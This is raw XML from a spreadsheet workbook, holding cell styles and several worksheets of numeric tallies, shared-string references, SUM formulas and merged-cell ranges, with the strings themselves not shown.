      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB7B7B7"/>
        <bgColor rgb="FFB7B7B7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEA9999"/>
        <bgColor rgb="FFEA9999"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEAD1DC"/>
        <bgColor rgb="FFEAD1DC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6B8AF"/>
        <bgColor rgb="FFE6B8AF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor theme="0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFCCCCCC"/>
        <bgColor rgb="FFCCCC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horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="8" fontId="1" numFmtId="0" xfId="0" applyFill="1" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>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shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7"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s>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="R1" s="1"/>
      <c r="S1" s="1"/>
      <c r="T1" s="5"/>
      <c r="U1" s="5"/>
      <c r="V1" s="5"/>
      <c r="W1" s="5"/>
      <c r="X1" s="5"/>
      <c r="Y1" s="5"/>
      <c r="Z1" s="5"/>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
      <c r="AE1" s="5"/>
      <c r="AF1" s="5"/>
      <c r="AG1" s="5"/>
      <c r="AH1" s="5"/>
      <c r="AI1" s="5"/>
      <c r="AJ1" s="5"/>
      <c r="AK1" s="5"/>
      <c r="AL1" s="5"/>
      <c r="AM1" s="5"/>
      <c r="AN1" s="5"/>
      <c r="AO1" s="5"/>
      <c r="AP1" s="5"/>
      <c r="AQ1" s="5"/>
      <c r="AR1" s="5"/>
      <c r="AS1" s="5"/>
      <c r="AT1" s="5"/>
    </row>
    <row r="2">
      <c r="B2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="C2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="D2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="E2" s="8" t="s">
        <v>6</v>
      </c>
      <c r="F2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="G2" s="9" t="s">
        <v>7</v>
      </c>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
      <c r="M2" s="1"/>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="1"/>
      <c r="Q2" s="1"/>
      <c r="R2" s="1"/>
      <c r="S2" s="1"/>
      <c r="T2" s="5"/>
      <c r="U2" s="5"/>
      <c r="V2" s="5"/>
      <c r="W2" s="5"/>
      <c r="X2" s="5"/>
      <c r="Y2" s="5"/>
      <c r="Z2" s="5"/>
      <c r="AA2" s="5"/>
      <c r="AB2" s="5"/>
      <c r="AC2" s="5"/>
      <c r="AD2" s="5"/>
      <c r="AE2" s="5"/>
      <c r="AF2" s="5"/>
      <c r="AG2" s="5"/>
      <c r="AH2" s="5"/>
      <c r="AI2" s="5"/>
      <c r="AJ2" s="5"/>
      <c r="AK2" s="5"/>
      <c r="AL2" s="5"/>
      <c r="AM2" s="5"/>
      <c r="AN2" s="5"/>
      <c r="AO2" s="5"/>
      <c r="AP2" s="5"/>
      <c r="AQ2" s="5"/>
      <c r="AR2" s="5"/>
      <c r="AS2" s="5"/>
      <c r="AT2" s="5"/>
    </row>
    <row r="3">
      <c r="A3" s="4" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="10">
        <v>11.0</v>
      </c>
      <c r="C3" s="10">
        <v>21.0</v>
      </c>
      <c r="D3" s="10">
        <v>17.0</v>
      </c>
      <c r="E3" s="4">
        <v>12.0</v>
      </c>
      <c r="F3" s="10">
        <v>21.0</v>
      </c>
      <c r="G3" s="4">
        <v>3.0</v>
      </c>
      <c r="H3" s="10">
        <v>23.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="4" t="s">
        <v>9</v>
      </c>
      <c r="B4" s="10">
        <v>9.0</v>
      </c>
      <c r="C4" s="4">
        <v>26.0</v>
      </c>
      <c r="D4" s="4">
        <v>10.0</v>
      </c>
      <c r="E4" s="4">
        <v>0.0</v>
      </c>
      <c r="F4" s="10">
        <v>29.0</v>
      </c>
      <c r="G4" s="4">
        <v>2.0</v>
      </c>
      <c r="H4" s="10">
        <v>30.0</v>
      </c>
      <c r="L4" s="4"/>
      <c r="P4" s="4"/>
    </row>
    <row r="5">
      <c r="A5" s="4" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="10">
        <v>3.0</v>
      </c>
      <c r="C5" s="10">
        <v>6.0</v>
      </c>
      <c r="D5" s="10">
        <v>6.0</v>
      </c>
      <c r="E5" s="4">
        <v>3.0</v>
      </c>
      <c r="F5" s="10">
        <v>6.0</v>
      </c>
      <c r="G5" s="4">
        <v>0.0</v>
      </c>
      <c r="H5" s="10">
        <v>6.0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="4" t="s">
        <v>11</v>
      </c>
      <c r="B6" s="4">
        <v>23.0</v>
      </c>
      <c r="C6" s="4">
        <v>32.0</v>
      </c>
      <c r="D6" s="4">
        <v>23.0</v>
      </c>
      <c r="E6" s="4">
        <v>1.0</v>
      </c>
      <c r="F6" s="4">
        <v>32.0</v>
      </c>
      <c r="G6" s="4">
        <v>0.0</v>
      </c>
      <c r="H6" s="4">
        <v>32.0</v>
      </c>
      <c r="K6" s="4"/>
      <c r="L6" s="4"/>
      <c r="N6" s="4"/>
      <c r="P6" s="4"/>
    </row>
    <row r="7">
      <c r="A7" s="4" t="s">
        <v>12</v>
      </c>
      <c r="B7" s="4">
        <v>12.0</v>
      </c>
      <c r="C7" s="4">
        <v>23.0</v>
      </c>
      <c r="D7" s="4">
        <v>18.0</v>
      </c>
      <c r="E7" s="4">
        <v>1.0</v>
      </c>
      <c r="F7" s="4">
        <v>23.0</v>
      </c>
      <c r="G7" s="4">
        <v>0.0</v>
      </c>
      <c r="H7" s="4">
        <v>23.0</v>
      </c>
      <c r="K7" s="4"/>
      <c r="L7" s="4"/>
      <c r="N7" s="4"/>
      <c r="P7" s="4"/>
    </row>
    <row r="8">
      <c r="A8" s="4" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="10">
        <v>3.0</v>
      </c>
      <c r="C8" s="4">
        <v>6.0</v>
      </c>
      <c r="D8" s="4">
        <v>4.0</v>
      </c>
      <c r="E8" s="4">
        <v>0.0</v>
      </c>
      <c r="F8" s="10">
        <v>6.0</v>
      </c>
      <c r="G8" s="4">
        <v>0.0</v>
      </c>
      <c r="H8" s="10">
        <v>6.0</v>
      </c>
      <c r="L8" s="4"/>
      <c r="P8" s="4"/>
    </row>
    <row r="9">
      <c r="A9" s="4" t="s">
        <v>14</v>
      </c>
      <c r="B9" s="4">
        <v>41.0</v>
      </c>
      <c r="C9" s="4">
        <v>49.0</v>
      </c>
      <c r="D9" s="4">
        <v>41.0</v>
      </c>
      <c r="E9" s="4">
        <v>1.0</v>
      </c>
      <c r="F9" s="4">
        <v>50.0</v>
      </c>
      <c r="G9" s="4">
        <v>0.0</v>
      </c>
      <c r="H9" s="4">
        <v>54.0</v>
      </c>
      <c r="K9" s="4"/>
      <c r="L9" s="4"/>
      <c r="N9" s="4"/>
      <c r="P9" s="4"/>
    </row>
    <row r="10">
      <c r="A10" s="4" t="s">
        <v>15</v>
      </c>
      <c r="B10" s="4">
        <v>4.0</v>
      </c>
      <c r="C10" s="4">
        <v>4.0</v>
      </c>
      <c r="D10" s="4">
        <v>3.0</v>
      </c>
      <c r="E10" s="4">
        <v>0.0</v>
      </c>
      <c r="F10" s="4">
        <v>4.0</v>
      </c>
      <c r="G10" s="4">
        <v>0.0</v>
      </c>
      <c r="H10" s="4">
        <v>4.0</v>
      </c>
      <c r="K10" s="4"/>
      <c r="L10" s="4"/>
      <c r="N10" s="4"/>
      <c r="P10" s="4"/>
    </row>
    <row r="11">
      <c r="A11" s="4" t="s">
        <v>16</v>
      </c>
      <c r="B11" s="4">
        <v>1.0</v>
      </c>
      <c r="C11" s="4">
        <v>1.0</v>
      </c>
      <c r="D11" s="4">
        <v>1.0</v>
      </c>
      <c r="E11" s="4">
        <v>0.0</v>
      </c>
      <c r="F11" s="4">
        <v>1.0</v>
      </c>
      <c r="G11" s="4">
        <v>0.0</v>
      </c>
      <c r="H11" s="4">
        <v>1.0</v>
      </c>
      <c r="K11" s="4"/>
      <c r="L11" s="4"/>
      <c r="N11" s="4"/>
      <c r="P11" s="4"/>
    </row>
    <row r="12">
      <c r="A12" s="4" t="s">
        <v>17</v>
      </c>
      <c r="B12" s="10">
        <v>2.0</v>
      </c>
      <c r="C12" s="4">
        <v>5.0</v>
      </c>
      <c r="D12" s="4">
        <v>2.0</v>
      </c>
      <c r="E12" s="4">
        <v>3.0</v>
      </c>
      <c r="F12" s="10">
        <v>5.0</v>
      </c>
      <c r="G12" s="4">
        <v>0.0</v>
      </c>
      <c r="H12" s="10">
        <v>5.0</v>
      </c>
      <c r="L12" s="4"/>
      <c r="P12" s="4"/>
      <c r="Q12" s="11"/>
      <c r="R12" s="11"/>
    </row>
    <row r="13">
      <c r="A13" s="12" t="s">
        <v>18</v>
      </c>
      <c r="B13" s="13">
        <f t="shared" ref="B13:D13" si="1">SUM(B3:B12)</f>
        <v>109</v>
      </c>
      <c r="C13" s="13">
        <f t="shared" si="1"/>
        <v>173</v>
      </c>
      <c r="D13" s="13">
        <f t="shared" si="1"/>
        <v>125</v>
      </c>
      <c r="E13" s="13"/>
      <c r="F13" s="13">
        <f>SUM(F3:F12)</f>
        <v>177</v>
      </c>
      <c r="G13" s="13"/>
      <c r="H13" s="13">
        <f>SUM(H3:H12)</f>
        <v>184</v>
      </c>
      <c r="K13" s="13"/>
      <c r="L13" s="13"/>
      <c r="M13" s="13"/>
      <c r="N13" s="13"/>
      <c r="O13" s="13"/>
      <c r="P13" s="13"/>
    </row>
    <row r="15">
      <c r="A15" s="4" t="s">
        <v>19</v>
      </c>
      <c r="B15" s="4">
        <v>59.24</v>
      </c>
      <c r="C15" s="4">
        <v>94.02</v>
      </c>
      <c r="D15" s="4">
        <v>67.93</v>
      </c>
      <c r="F15" s="4">
        <v>96.02</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="4" t="s">
        <v>20</v>
      </c>
      <c r="D16" s="4">
        <v>76.69</v>
      </c>
      <c r="F16" s="4">
        <v>98.88</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="4" t="s">
        <v>21</v>
      </c>
      <c r="D17" s="4">
        <v>80.91</v>
      </c>
      <c r="F17" s="4">
        <v>98.06</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="4" t="s">
        <v>22</v>
      </c>
      <c r="D18" s="4">
        <v>85.62</v>
      </c>
      <c r="F18" s="4">
        <v>97.25</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:C1"/>
    <mergeCell ref="D1:G1"/>
    <mergeCell ref="H1:H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v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
      <c r="Q1" s="5"/>
      <c r="R1" s="5"/>
      <c r="S1" s="5"/>
      <c r="T1" s="5"/>
      <c r="U1" s="5"/>
      <c r="V1" s="5"/>
      <c r="W1" s="5"/>
      <c r="X1" s="5"/>
      <c r="Y1" s="5"/>
      <c r="Z1" s="5"/>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
      <c r="AE1" s="5"/>
      <c r="AF1" s="5"/>
      <c r="AG1" s="5"/>
      <c r="AH1" s="5"/>
      <c r="AI1" s="5"/>
      <c r="AJ1" s="5"/>
      <c r="AK1" s="5"/>
    </row>
    <row r="2" ht="18.0" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="1"/>
      <c r="Q2" s="5"/>
      <c r="R2" s="5"/>
      <c r="S2" s="5"/>
      <c r="T2" s="5"/>
      <c r="U2" s="5"/>
      <c r="V2" s="5"/>
      <c r="W2" s="5"/>
      <c r="X2" s="5"/>
      <c r="Y2" s="5"/>
      <c r="Z2" s="5"/>
      <c r="AA2" s="5"/>
      <c r="AB2" s="5"/>
      <c r="AC2" s="5"/>
      <c r="AD2" s="5"/>
      <c r="AE2" s="5"/>
      <c r="AF2" s="5"/>
      <c r="AG2" s="5"/>
      <c r="AH2" s="5"/>
      <c r="AI2" s="5"/>
      <c r="AJ2" s="5"/>
      <c r="AK2" s="5"/>
    </row>
    <row r="3" ht="14.25" customHeight="1">
      <c r="A3" s="4" t="s">
        <v>663</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>664</v>
      </c>
      <c r="C3" s="4">
        <v>1.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>665</v>
      </c>
      <c r="E3" s="4">
        <v>1.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>665</v>
      </c>
      <c r="G3" s="4">
        <v>1.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>666</v>
      </c>
      <c r="J3" s="4">
        <v>1.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>666</v>
      </c>
      <c r="M3" s="4">
        <v>1.0</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M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0.88"/>
    <col customWidth="1" min="11" max="11" width="20.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
      <c r="Q1" s="1"/>
      <c r="R1" s="1"/>
      <c r="S1" s="5"/>
      <c r="T1" s="5"/>
      <c r="U1" s="5"/>
      <c r="V1" s="5"/>
      <c r="W1" s="5"/>
      <c r="X1" s="5"/>
      <c r="Y1" s="5"/>
      <c r="Z1" s="5"/>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
      <c r="AE1" s="5"/>
      <c r="AF1" s="5"/>
      <c r="AG1" s="5"/>
      <c r="AH1" s="5"/>
      <c r="AI1" s="5"/>
      <c r="AJ1" s="5"/>
      <c r="AK1" s="5"/>
      <c r="AL1" s="5"/>
      <c r="AM1" s="5"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="46" t="s">
        <v>667</v>
      </c>
      <c r="B3" s="47" t="s">
        <v>668</v>
      </c>
      <c r="C3" s="47">
        <v>0.0</v>
      </c>
      <c r="D3" s="47" t="s">
        <v>669</v>
      </c>
      <c r="E3" s="47">
        <v>1.0</v>
      </c>
      <c r="F3" s="47" t="s">
        <v>670</v>
      </c>
      <c r="G3" s="4">
        <v>1.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>671</v>
      </c>
      <c r="J3" s="47">
        <v>1.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="47" t="s">
        <v>670</v>
      </c>
      <c r="M3" s="47">
        <v>1.0</v>
      </c>
    </row>
    <row r="4" ht="12.0" customHeight="1">
      <c r="A4" s="4" t="s">
        <v>672</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>673</v>
      </c>
      <c r="C4" s="4">
        <v>1.0</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>674</v>
      </c>
      <c r="E4" s="4">
        <v>3.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>675</v>
      </c>
      <c r="G4" s="4">
        <v>0.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>676</v>
      </c>
      <c r="J4" s="4">
        <v>3.0</v>
      </c>
      <c r="K4" s="4">
        <v>2.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>677</v>
      </c>
      <c r="M4" s="4">
        <v>3.0</v>
      </c>
    </row>
    <row r="5" ht="16.5" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>678</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>679</v>
      </c>
      <c r="C5" s="4">
        <v>1.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>680</v>
      </c>
      <c r="E5" s="4">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>681</v>
      </c>
      <c r="G5" s="4">
        <v>1.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>682</v>
      </c>
      <c r="J5" s="4">
        <v>1.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>681</v>
      </c>
      <c r="M5" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="6">
      <c r="C6" s="10">
        <f t="shared" ref="C6:E6" si="1">sum(C3:C5)</f>
        <v>2</v>
      </c>
      <c r="D6" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="E6" s="10">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="G6" s="10">
        <f t="shared" ref="G6:H6" si="2">SUM(G3:G5)</f>
        <v>2</v>
      </c>
      <c r="H6" s="10">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J6" s="10">
        <f>sum(J3:J5)</f>
        <v>5</v>
      </c>
      <c r="K6" s="10">
        <f>SUM(K3:K5)</f>
        <v>2</v>
      </c>
      <c r="L6" s="10">
        <f t="shared" ref="L6:M6" si="3">sum(L3:L5)</f>
        <v>0</v>
      </c>
      <c r="M6" s="10">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="7">
      <c r="H7" s="4">
        <v>0.0</v>
      </c>
      <c r="K7" s="10">
        <f>K6/(J6+K6)</f>
        <v>0.2857142857</v>
      </c>
    </row>
    <row r="8">
      <c r="H8" s="4" t="s">
        <v>564</v>
      </c>
      <c r="K8" s="4" t="s">
        <v>683</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M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25"/>
    <col customWidth="1" min="4" max="4" width="19.88"/>
    <col customWidth="1" min="6" max="6" width="17.38"/>
    <col customWidth="1" min="8" max="8" width="24.0"/>
    <col customWidth="1" min="9" max="9" width="16.63"/>
    <col customWidth="1" min="11" max="11" width="23.75"/>
    <col customWidth="1" min="12" max="12" width="23.13"/>
    <col customWidth="1" min="29" max="29" width="12.5"/>
    <col hidden="1" min="32" max="33" width="12.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1"/>
      <c r="Q1" s="1"/>
      <c r="R1" s="1"/>
      <c r="S1" s="1"/>
      <c r="T1" s="1"/>
      <c r="U1" s="1"/>
      <c r="V1" s="1"/>
      <c r="W1" s="1"/>
      <c r="X1" s="1"/>
      <c r="Y1" s="1"/>
      <c r="Z1" s="1"/>
      <c r="AA1" s="1"/>
      <c r="AB1" s="1"/>
      <c r="AC1" s="1"/>
      <c r="AD1" s="1"/>
      <c r="AE1" s="1"/>
      <c r="AF1" s="1"/>
      <c r="AG1" s="1"/>
      <c r="AH1" s="5"/>
      <c r="AI1" s="5"/>
      <c r="AJ1" s="5"/>
      <c r="AK1" s="5"/>
      <c r="AL1" s="5"/>
      <c r="AM1" s="5"/>
      <c r="AN1" s="5"/>
      <c r="AO1" s="5"/>
      <c r="AP1" s="5"/>
      <c r="AQ1" s="5"/>
      <c r="AR1" s="5"/>
      <c r="AS1" s="5"/>
      <c r="AT1" s="5"/>
      <c r="AU1" s="5"/>
      <c r="AV1" s="5"/>
      <c r="AW1" s="5"/>
      <c r="AX1" s="5"/>
      <c r="AY1" s="5"/>
      <c r="AZ1" s="5"/>
      <c r="BA1" s="5"/>
      <c r="BB1" s="5"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
